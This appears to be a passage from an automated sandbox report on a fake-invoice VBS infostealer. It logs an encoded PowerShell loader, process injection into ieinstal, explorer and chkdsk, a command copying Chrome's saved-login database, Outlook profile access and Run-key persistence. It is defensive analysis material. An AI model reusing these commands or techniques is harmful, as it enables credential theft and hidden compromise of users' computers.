      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071A3FA NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071A47A NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071A52A NtAllocateVirtualMemory,
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE730232 NtCreateFile,NtWriteFile,
      Source: WWVN_INVOICE_8363567453.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: edgegdi.dll
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
      Source: WWVN_INVOICE_8363567453.vbsReversingLabs: Detection: 24%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220510Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Hetero3.datJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@22/16@21/8
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:120:WilError_03
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
      Source: C:\Windows\SysWOW64\chkdsk.exeFile written: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: Binary string: chkdsk.pdbGCTL source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ieinstal.pdb source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: $2l8C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: chkdsk.pdb source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1816473649.0000000008901000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000000.1581138721.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_0300E359 push F6D28566h; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0070E287 push B364374Eh; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071D4F2 push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071D4FB push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071D4A5 push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071D55C push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071E90F push esp; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_00717B37 push cs; ret
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dllJump to dropped file
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE72ACD4 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE72ACE2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,
      Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPXJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
